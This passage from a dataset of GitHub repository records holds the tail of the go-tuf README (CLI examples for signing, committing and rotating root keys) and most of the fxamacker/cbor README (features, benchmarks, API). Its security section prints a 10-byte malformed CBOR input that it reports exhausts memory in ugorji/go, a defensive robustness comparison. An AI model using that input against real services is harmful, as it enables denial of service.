snapshot.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets.json\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\u251c\u2500\u2500 repository\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 root.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 snapshot.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 foo\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 bar\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 baz.txt\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets.json\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\u2514\u2500\u2500 staged\n\n$ tuf remove foo/bar/baz.txt\nEnter targets keys passphrase:\n\n$ tree .\n.\n\u251c\u2500\u2500 keys\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 snapshot.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets.json\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\u251c\u2500\u2500 repository\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 root.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 snapshot.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 
foo\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 bar\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 baz.txt\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets.json\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\u2514\u2500\u2500 staged\n \u2514\u2500\u2500 targets.json\n\n$ tuf snapshot\nEnter snapshot keys passphrase:\n\n$ tuf timestamp\nEnter timestamp keys passphrase:\n\n$ tree .\n.\n\u251c\u2500\u2500 keys\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 snapshot.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets.json\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\u251c\u2500\u2500 repository\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 root.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 snapshot.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 foo\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 bar\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 baz.txt\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets.json\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\u2514\u2500\u2500 staged\n \u00a0\u00a0 \u251c\u2500\u2500 snapshot.json\n \u00a0\u00a0 \u251c\u2500\u2500 targets.json\n \u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\n$ tuf commit\n\n$ tree .\n.\n\u251c\u2500\u2500 keys\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 snapshot.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets.json\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\u251c\u2500\u2500 repository\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 root.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 snapshot.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets.json\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\u2514\u2500\u2500 staged\n```\n\n#### Regenerate metadata files based on targets tree (Note: Not supported yet)\n\n```bash\n$ tree .\n.\n\u251c\u2500\u2500 keys\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 snapshot.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets.json\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\u251c\u2500\u2500 repository\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 root.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 snapshot.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 foo\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 bar\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 baz.txt\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets.json\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\u2514\u2500\u2500 staged\n\n$ tuf regenerate\nEnter targets keys passphrase:\n\n$ tree .\n.\n\u251c\u2500\u2500 keys\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 snapshot.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets.json\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\u251c\u2500\u2500 repository\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 root.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 snapshot.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 foo\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 bar\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 baz.txt\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets.json\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\u2514\u2500\u2500 staged\n \u2514\u2500\u2500 targets.json\n\n$ tuf snapshot\nEnter snapshot keys passphrase:\n\n$ tuf timestamp\nEnter timestamp keys passphrase:\n\n$ tree .\n.\n\u251c\u2500\u2500 keys\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 snapshot.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 
targets.json\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\u251c\u2500\u2500 repository\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 root.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 snapshot.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 foo\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 bar\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 baz.txt\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets.json\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\u2514\u2500\u2500 staged\n \u00a0\u00a0 \u251c\u2500\u2500 snapshot.json\n \u00a0\u00a0 \u251c\u2500\u2500 targets.json\n \u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\n$ tuf commit\n\n$ tree .\n.\n\u251c\u2500\u2500 keys\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 snapshot.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets.json\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\u251c\u2500\u2500 repository\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 root.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 snapshot.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 foo\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 bar\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 baz.txt\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets.json\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\u2514\u2500\u2500 staged\n```\n\n#### Update timestamp.json\n\n```bash\n$ tree .\n.\n\u251c\u2500\u2500 keys\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\u251c\u2500\u2500 repository\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 root.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 snapshot.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 foo\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 bar\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 baz.txt\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets.json\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\u2514\u2500\u2500 staged\n\n$ tuf timestamp\nEnter timestamp keys passphrase:\n\n$ tree .\n.\n\u251c\u2500\u2500 keys\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\u251c\u2500\u2500 repository\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 root.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 snapshot.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 foo\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 bar\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 baz.txt\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets.json\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\u2514\u2500\u2500 staged\n \u2514\u2500\u2500 timestamp.json\n\n$ tuf commit\n\n$ tree .\n.\n\u251c\u2500\u2500 keys\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\u251c\u2500\u2500 repository\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 root.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 snapshot.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 foo\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 bar\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 baz.txt\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets.json\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\u2514\u2500\u2500 staged\n```\n\n#### Adding a new root key\n\nCopy `staged/root.json` to the root box and generate a new root key on the root box:\n\n```bash\n$ tuf gen-key root\n$ tuf sign 
root.json\n```\n\nCopy `staged/root.json` from the root box and commit:\n\n```bash\n$ tuf commit\n```\n\n#### Rotating root key(s)\n\nCopy `staged/root.json` to the root box to do the rotation, where `abcd` is the keyid of the key that is being replaced:\n\n```bash\n$ tuf gen-key root\n$ tuf revoke-key root abcd\n$ tuf sign root.json\n```\n\nNote that `revoke-key` removes the old key from `root.json`, but the key remains in the `keys/` directory on the root box as it is needed to sign the next `root.json`. After this signing is done, the old key may be removed from `keys/`. Any number of keys may be added or revoked during this step, but ensure that at least a threshold of valid keys remain.\n\nCopy `staged/root.json` from the root box to commit:\n\n```bash\n$ tuf commit\n```\n\n## Client\n\nFor the client package, see https://godoc.org/github.com/theupdateframework/go-tuf/client.\n\nFor the client CLI, see https://github.com/theupdateframework/go-tuf/tree/master/cmd/tuf-client.\n\n## Contributing and Development\n\nFor local development, `go-tuf` requires Go version 1.18.\n\nThe [Python interoperability tests](client/python_interop/) require Python 3\n(available as `python` on the `$PATH`) and the [`python-tuf`\npackage](https://github.com/theupdateframework/python-tuf) installed (`pip\ninstall tuf`). To update the data for these tests requires Docker and make (see\ntest data [README.md](client/python_interop/testdata/README.md) for details).\n\nPlease see [CONTRIBUTING.md](docs/CONTRIBUTING.md) for contribution guidelines before making your first contribution!\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "fxamacker/cbor", "link": "https://github.com/fxamacker/cbor", "tags": ["cbor", "rfc-8949", "rfc-7049", "cose", "cwt", "go", "golang", "json-alternative", "serialization", "cbor-library"], "stars": 530, "description": "CBOR codec (RFC 8949) with CBOR tags, Go struct tags (toarray, keyasint, omitempty), float64/32/16, big.Int, and fuzz tested billions of execs. ", "lang": "Go", "repo_lang": "", "readme": "# CBOR Codec in Go\n\n[![](https://github.com/fxamacker/images/raw/master/cbor/v2.5.0/fxamacker_cbor_banner.png)](#cbor-library-in-go)\n\n[![](https://github.com/fxamacker/cbor/workflows/ci/badge.svg)](https://github.com/fxamacker/cbor/actions?query=workflow%3Aci)\n[![](https://github.com/fxamacker/cbor/workflows/cover%20%E2%89%A598%25/badge.svg)](https://github.com/fxamacker/cbor/actions?query=workflow%3A%22cover+%E2%89%A598%25%22)\n[![](https://github.com/fxamacker/cbor/workflows/linters/badge.svg)](https://github.com/fxamacker/cbor/actions?query=workflow%3Alinters)\n[![CodeQL](https://github.com/fxamacker/cbor/actions/workflows/codeql-analysis.yml/badge.svg)](https://github.com/fxamacker/cbor/actions/workflows/codeql-analysis.yml)\n[![](https://img.shields.io/badge/fuzzing-3%2B%20billion%20execs-44c010)](#fuzzing-and-code-coverage)\n[![Go Report Card](https://goreportcard.com/badge/github.com/fxamacker/cbor)](https://goreportcard.com/report/github.com/fxamacker/cbor)\n[![](https://img.shields.io/badge/go-%3E%3D%201.12-blue)](#cbor-library-installation)\n\n[__fxamacker/cbor__](https://github.com/fxamacker/cbor) is a modern [CBOR](https://tools.ietf.org/html/rfc8949) codec in [Go](https://golang.org). It's like `encoding/json` for CBOR with time-saving features. 
It balances [security](https://github.com/fxamacker/cbor/#cbor-security), usability, [speed](https://github.com/fxamacker/cbor/#cbor-performance), data size, program size, and other competing factors.\n\nFeatures include CBOR tags, duplicate map key detection, float64\u219232\u219216, and Go struct tags (`toarray`, `keyasint`, `omitempty`). API is close to `encoding/json` plus predefined CBOR options like Core Deterministic Encoding, Preferred Serialization, CTAP2, etc.\n\nUsing CBOR [Preferred Serialization](https://www.rfc-editor.org/rfc/rfc8949.html#name-preferred-serialization) with Go struct tags (`toarray`, `keyasint`, `omitempty`) reduces programming effort and creates smaller encoded data size.\n\nThere are [1276 repositories](https://github.com/fxamacker/cbor/network/dependents?package_id=UGFja2FnZS0yMjcwNDY1OTQ4) that depend on fxamacker/cbor/v2. Additional 155 repositories are using version 1.x of this CBOR codec (please upgrade to v2).\n\nfxamacker/cbor is used by Arm Ltd., Berlin Institute of Health at Charit\u00e9, Chainlink, ConsenSys, Dapper Labs, Duo Labs (cisco), EdgeX Foundry, Mozilla, National Cybersecurity Agency of France (govt), Netherlands (govt), Oasis Labs, Tailscale, Taurus SA, Teleport, TIBCO, and others.\n\nMicrosoft Corporation had NCC Group conduct a security assessment (PDF) which includes portions of this library in its scope.\n\nfxamacker/cbor has 98% coverage and is fuzz tested.\n\nInstall with `go get github.com/fxamacker/cbor/v2` and `import \"github.com/fxamacker/cbor/v2\"`. \nSee [Quick Start](#quick-start) to save time.\n\n## What is CBOR?\n\n[CBOR](https://tools.ietf.org/html/rfc8949) is a concise binary data format inspired by [JSON](https://www.json.org) and [MessagePack](https://msgpack.org). CBOR is defined in [RFC 8949](https://tools.ietf.org/html/rfc8949) (December 2020) which obsoletes [RFC 7049](https://tools.ietf.org/html/rfc7049) (October 2013). \n\nCBOR is an [Internet Standard](https://en.wikipedia.org/wiki/Internet_Standard) by [IETF](https://www.ietf.org). It's used in other standards like [WebAuthn](https://en.wikipedia.org/wiki/WebAuthn) by [W3C](https://www.w3.org), [COSE (RFC 8152)](https://tools.ietf.org/html/rfc8152), [CWT (RFC 8392)](https://tools.ietf.org/html/rfc8392), [CDDL (RFC 8610)](https://datatracker.ietf.org/doc/html/rfc8610) and [more](CBOR_GOLANG.md).\n\n[Reasons for choosing CBOR](https://github.com/fxamacker/cbor/wiki/Why-CBOR) vary by project. Some projects replaced protobuf, encoding/json, encoding/gob, etc. with CBOR. For example, by replacing protobuf with CBOR in gRPC.\n\n## Why fxamacker/cbor?\n\nfxamacker/cbor balances competing factors such as speed, size, safety, usability, maintainability, and etc.\n\n- Killer features include Go struct tags like `toarray`, `keyasint`, etc. They reduce encoded data size, improve speed, and reduce programming effort. For example, `toarray` automatically translates a Go struct to/from a CBOR array.\n\n- Modern CBOR features include Core Deterministic Encoding and Preferred Encoding. Other features include CBOR tags, big.Int, float64\u219232\u219216, an API like `encoding/json`, and more.\n\n- Security features include the option to detect duplicate map keys and options to set various max limits. And it's designed to make concurrent use of CBOR options easy and free from side-effects. 
\n\n- To prevent crashes, it has been fuzz-tested since before release 1.0 and code coverage is kept above 98%.\n\n- For portability and safety, it avoids using `unsafe`, which makes it portable and protected by Go1's compatibility guidelines. \n\n- For performance, it uses safe optimizations. When used properly, fxamacker/cbor can be faster than CBOR codecs that rely on `unsafe`. However, speed is only one factor and should be considered together with other competing factors.\n\n## CBOR Security\n\n__fxamacker/cbor__ is secure. It rejects malformed CBOR data and has an option to detect duplicate map keys. It doesn't crash when decoding bad CBOR data. It has extensive tests, coverage-guided fuzzing, data validation, and avoids Go's `unsafe` package.\n\nDecoding 9 or 10 bytes of malformed CBOR data shouldn't exhaust memory. For example, \n`[]byte{0x9B, 0x00, 0x00, 0x42, 0xFA, 0x42, 0xFA, 0x42, 0xFA, 0x42}`\n\n| | Decode bad 10 bytes to interface{} | Decode bad 10 bytes to []byte |\n| :--- | :------------------ | :--------------- |\n| fxamacker/cbor
1.0-2.3 | 49.44 ns/op, 24 B/op, 2 allocs/op* | 51.93 ns/op, 32 B/op, 2 allocs/op* |\n| ugorji/go 1.2.6 | \u26a0\ufe0f 45021 ns/op, 262852 B/op, 7 allocs/op | \ud83d\udca5 runtime: out of memory: cannot allocate |\n| ugorji/go 1.1-1.1.7 | \ud83d\udca5 runtime: out of memory: cannot allocate | \ud83d\udca5 runtime: out of memory: cannot allocate|\n\n*Speed and memory are for latest codec version listed in the row (compiled with Go 1.17.5).\n\nfxamacker/cbor CBOR safety settings include: MaxNestedLevels, MaxArrayElements, MaxMapPairs, and IndefLength.\n\nFor more info, see:\n - [RFC 8949 Section 10 (Security Considerations)](https://tools.ietf.org/html/rfc8949#section-10) or [RFC 7049 Section 8](https://tools.ietf.org/html/rfc7049#section-8).\n - [Go warning](https://golang.org/pkg/unsafe/), \"Packages that import unsafe may be non-portable and are not protected by the Go 1 compatibility guidelines.\"\n\n## CBOR Performance\n\n__fxamacker/cbor__ is fast without sacrificing security. It can be faster than libraries relying on `unsafe` package.\n\n![alt text](https://github.com/fxamacker/images/raw/master/cbor/v2.3.0/cbor_speed_comparison.svg?sanitize=1 \"CBOR speed comparison chart\")\n\n__Click to expand:__\n\n
\n__\ud83d\udc49 CBOR Program Size Comparison__

\n\n__fxamacker/cbor__ produces smaller programs without sacrificing features.\n \n![alt text](https://github.com/fxamacker/images/raw/master/cbor/v2.3.0/cbor_size_comparison.svg?sanitize=1 \"CBOR program size comparison chart\")\n\n

\n\n
__\ud83d\udc49 fxamacker/cbor 2.3.0 (safe) vs ugorji/go 1.2.6 (unsafe)__

\n\nfxamacker/cbor 2.3.0 (not using `unsafe`) is faster than ugorji/go 1.2.6 (using `unsafe`).\n\n```\nbenchstat results/bench-ugorji-go-count20.txt results/bench-fxamacker-cbor-count20.txt \nname old time/op new time/op delta\nDecodeCWTClaims-8 1.08\u00b5s \u00b1 0% 0.67\u00b5s \u00b1 0% -38.10% (p=0.000 n=16+20)\nDecodeCOSE/128-Bit_Symmetric_Key-8 715ns \u00b1 0% 501ns \u00b1 0% -29.97% (p=0.000 n=20+19)\nDecodeCOSE/256-Bit_Symmetric_Key-8 722ns \u00b1 0% 507ns \u00b1 0% -29.72% (p=0.000 n=19+18)\nDecodeCOSE/ECDSA_P256_256-Bit_Key-8 1.11\u00b5s \u00b1 0% 0.83\u00b5s \u00b1 0% -25.27% (p=0.000 n=19+20)\nDecodeWebAuthn-8 880ns \u00b1 0% 727ns \u00b1 0% -17.31% (p=0.000 n=18+20)\nEncodeCWTClaims-8 785ns \u00b1 0% 388ns \u00b1 0% -50.51% (p=0.000 n=20+20)\nEncodeCOSE/128-Bit_Symmetric_Key-8 973ns \u00b1 0% 433ns \u00b1 0% -55.45% (p=0.000 n=20+19)\nEncodeCOSE/256-Bit_Symmetric_Key-8 974ns \u00b1 0% 435ns \u00b1 0% -55.37% (p=0.000 n=20+19)\nEncodeCOSE/ECDSA_P256_256-Bit_Key-8 1.14\u00b5s \u00b1 0% 0.55\u00b5s \u00b1 0% -52.10% (p=0.000 n=19+19)\nEncodeWebAuthn-8 564ns \u00b1 0% 450ns \u00b1 1% -20.18% (p=0.000 n=18+20)\n\nname old alloc/op new alloc/op delta\nDecodeCWTClaims-8 744B \u00b1 0% 160B \u00b1 0% -78.49% (p=0.000 n=20+20)\nDecodeCOSE/128-Bit_Symmetric_Key-8 792B \u00b1 0% 232B \u00b1 0% -70.71% (p=0.000 n=20+20)\nDecodeCOSE/256-Bit_Symmetric_Key-8 816B \u00b1 0% 256B \u00b1 0% -68.63% (p=0.000 n=20+20)\nDecodeCOSE/ECDSA_P256_256-Bit_Key-8 905B \u00b1 0% 344B \u00b1 0% -61.99% (p=0.000 n=20+20)\nDecodeWebAuthn-8 1.56kB \u00b1 0% 0.99kB \u00b1 0% -36.41% (p=0.000 n=20+20)\nEncodeCWTClaims-8 1.35kB \u00b1 0% 0.18kB \u00b1 0% -86.98% (p=0.000 n=20+20)\nEncodeCOSE/128-Bit_Symmetric_Key-8 1.95kB \u00b1 0% 0.22kB \u00b1 0% -88.52% (p=0.000 n=20+20)\nEncodeCOSE/256-Bit_Symmetric_Key-8 1.95kB \u00b1 0% 0.24kB \u00b1 0% -87.70% (p=0.000 n=20+20)\nEncodeCOSE/ECDSA_P256_256-Bit_Key-8 1.95kB \u00b1 0% 0.32kB \u00b1 0% -83.61% (p=0.000 n=20+20)\nEncodeWebAuthn-8 1.30kB \u00b1 0% 1.09kB \u00b1 0% -16.56% (p=0.000 n=20+20)\n\nname old allocs/op new allocs/op delta\nDecodeCWTClaims-8 6.00 \u00b1 0% 6.00 \u00b1 0% ~ (all equal)\nDecodeCOSE/128-Bit_Symmetric_Key-8 4.00 \u00b1 0% 4.00 \u00b1 0% ~ (all equal)\nDecodeCOSE/256-Bit_Symmetric_Key-8 4.00 \u00b1 0% 4.00 \u00b1 0% ~ (all equal)\nDecodeCOSE/ECDSA_P256_256-Bit_Key-8 7.00 \u00b1 0% 7.00 \u00b1 0% ~ (all equal)\nDecodeWebAuthn-8 5.00 \u00b1 0% 5.00 \u00b1 0% ~ (all equal)\nEncodeCWTClaims-8 4.00 \u00b1 0% 2.00 \u00b1 0% -50.00% (p=0.000 n=20+20)\nEncodeCOSE/128-Bit_Symmetric_Key-8 6.00 \u00b1 0% 2.00 \u00b1 0% -66.67% (p=0.000 n=20+20)\nEncodeCOSE/256-Bit_Symmetric_Key-8 6.00 \u00b1 0% 2.00 \u00b1 0% -66.67% (p=0.000 n=20+20)\nEncodeCOSE/ECDSA_P256_256-Bit_Key-8 6.00 \u00b1 0% 2.00 \u00b1 0% -66.67% (p=0.000 n=20+20)\nEncodeWebAuthn-8 4.00 \u00b1 0% 2.00 \u00b1 0% -50.00% (p=0.000 n=20+20)\n```\n

\n\nBenchmarks used Go 1.17.5, linux_amd64, and data from [RFC 8392 Appendix A.1](https://tools.ietf.org/html/rfc8392#appendix-A.1). Default build options were used for all CBOR libraries. Library init code was put outside the benchmark loop for all libraries compared.\n\n## CBOR API\n\n__fxamacker/cbor__ is easy to use. It provides a standard API and interfaces.\n\n__Standard API__. Function signatures identical to [`encoding/json`](https://golang.org/pkg/encoding/json/) include: \n`Marshal`, `Unmarshal`, `NewEncoder`, `NewDecoder`, `(*Encoder).Encode`, and `(*Decoder).Decode`.\n\n__Standard Interfaces__. Custom encoding and decoding are handled by implementing: \n`BinaryMarshaler`, `BinaryUnmarshaler`, `Marshaler`, and `Unmarshaler`.\n\n__Predefined Encoding Options__. Encoding options are easy to use and are customizable.\n\n```go\nfunc CoreDetEncOptions() EncOptions {} // RFC 8949 Core Deterministic Encoding\nfunc PreferredUnsortedEncOptions() EncOptions {} // RFC 8949 Preferred Serialization\nfunc CanonicalEncOptions() EncOptions {} // RFC 7049 Canonical CBOR\nfunc CTAP2EncOptions() EncOptions {} // FIDO2 CTAP2 Canonical CBOR\n```\n\nfxamacker/cbor is designed to simplify concurrency. CBOR options can be used without creating unintended runtime side-effects.\n\n## Go Struct Tags\n\n__fxamacker/cbor__ provides Go struct tags like __`toarray`__ and __`keyasint`__ to save time and reduce the encoded size of data.\n\n
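As a quick text-only illustration (the types, field names, and integer keys below are made up for this sketch rather than taken from any standard), `keyasint` replaces string field names with small integer map keys and `toarray` flattens a struct into a CBOR array:\n\n```go\n// Illustrative sketch only: these types are hypothetical.\ntype header struct {\n\tAlg int `cbor:\"1,keyasint,omitempty\"` // encoded with CBOR map key 1 instead of \"Alg\"\n\tKid []byte `cbor:\"4,keyasint,omitempty\"` // encoded with CBOR map key 4 instead of \"Kid\"\n}\n\ntype event struct {\n\t_ struct{} `cbor:\",toarray\"` // encode this struct as a CBOR array\n\tID uint64\n\tName string\n}\n\nb1, _ := cbor.Marshal(header{Alg: -7}) // encodes as the CBOR map {1: -7}\nb2, _ := cbor.Marshal(event{ID: 7, Name: \"boot\"}) // encodes as the CBOR array [7, \"boot\"]\n```\n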
\n\n![alt text](https://github.com/fxamacker/images/raw/master/cbor/v2.3.0/cbor_struct_tags_api.svg?sanitize=1 \"CBOR API and Go Struct Tags\")\n\n## CBOR Features\n\n__fxamacker/cbor__ is a full-featured CBOR encoder and decoder.\n\n| | CBOR Feature | Description |\n| :--- | :--- | :--- |\n| \u2611\ufe0f | CBOR tags | API supports built-in and user-defined tags. |\n| \u2611\ufe0f | Preferred serialization | Integers encode to fewest bytes. Optional float64 \u2192 float32 \u2192 float16. |\n| \u2611\ufe0f | Map key sorting | Unsorted, length-first (Canonical CBOR), and bytewise-lexicographic (CTAP2). |\n| \u2611\ufe0f | Duplicate map keys | Always forbid for encoding and option to allow/forbid for decoding. |\n| \u2611\ufe0f | Indefinite length data | Option to allow/forbid for encoding and decoding. |\n| \u2611\ufe0f | Well-formedness | Always checked and enforced. |\n| \u2611\ufe0f | Basic validity checks | Check UTF-8 validity and optionally check duplicate map keys. |\n| \u2611\ufe0f | Security considerations | Prevent integer overflow and resource exhaustion (RFC 8949 Section 10). |\n\n## CBOR Library Installation\n\nfxamacker/cbor supports Go 1.12 and newer versions. Init the Go module, go get v2, and begin coding.\n\n```\ngo mod init github.com/my_name/my_repo\ngo get github.com/fxamacker/cbor/v2\n```\n\n```go\nimport \"github.com/fxamacker/cbor/v2\" // imports as cbor\n```\n\n## Quick Start\n\ud83d\udee1\ufe0f Use Go's `io.LimitReader` to limit size when decoding very large or indefinite size data.\n\nImport using \"/v2\" like this: `import \"github.com/fxamacker/cbor/v2\"`, and \nit will import version 2.x as package \"cbor\" (when using Go modules).\n\nFunctions with identical signatures to encoding/json include: \n`Marshal`, `Unmarshal`, `NewEncoder`, `NewDecoder`, `(*Encoder).Encode`, `(*Decoder).Decode`.\n\n__Default Mode__ \n\nIf default options are acceptable, package level functions can be used for encoding and decoding.\n\n```go\nb, err := cbor.Marshal(v) // encode v to []byte b\nerr := cbor.Unmarshal(b, &v) // decode []byte b to v\nencoder := cbor.NewEncoder(w) // create encoder with io.Writer w\ndecoder := cbor.NewDecoder(r) // create decoder with io.Reader r\n```\n\n__Modes__\n\nIf you need to use options or CBOR tags, then you'll want to create a mode.\n\n\"Mode\" means defined way of encoding or decoding -- it links the standard API to your CBOR options and CBOR tags. This way, you don't pass around options and the API remains identical to `encoding/json`.\n\nEncMode and DecMode are interfaces created from EncOptions or DecOptions structs. \nFor example, `em, err := cbor.EncOptions{...}.EncMode()` or `em, err := cbor.CanonicalEncOptions().EncMode()`.\n\nEncMode and DecMode use immutable options so their behavior won't accidentally change at runtime. Modes are reusable, safe for concurrent use, and allow fast parallelism.\n\n__Creating and Using Encoding Modes__\n\n\ud83d\udca1 Avoid using init(). For best performance, reuse EncMode and DecMode after creating them.\n\nMost apps will probably create one EncMode and DecMode before init(). There's no limit and each can use different options.\n\n```go\n// Create EncOptions using either struct literal or a function.\nopts := cbor.CanonicalEncOptions()\n\n// If needed, modify opts. 
For example: opts.Time = cbor.TimeUnix\n\n// Create reusable EncMode interface with immutable options, safe for concurrent use.\nem, err := opts.EncMode() \n\n// Use EncMode like encoding/json, with same function signatures.\nb, err := em.Marshal(v) // encode v to []byte b\n\nencoder := em.NewEncoder(w) // create encoder with io.Writer w\nerr := encoder.Encode(v) // encode v to io.Writer w\n```\n\nBoth `em.Marshal(v)` and `encoder.Encode(v)` use encoding options specified during creation of encoding mode `em`.\n\n__Creating Modes With CBOR Tags__\n\nA TagSet is used to specify CBOR tags.\n \n```go\nem, err := opts.EncMode() // no tags\nem, err := opts.EncModeWithTags(ts) // immutable tags\nem, err := opts.EncModeWithSharedTags(ts) // mutable shared tags\n```\n\nTagSet and all modes using it are safe for concurrent use. Equivalent API is available for DecMode.\n\n__Predefined Encoding Options__\n\n```go\nfunc CoreDetEncOptions() EncOptions {} // RFC 8949 Core Deterministic Encoding\nfunc PreferredUnsortedEncOptions() EncOptions {} // RFC 8949 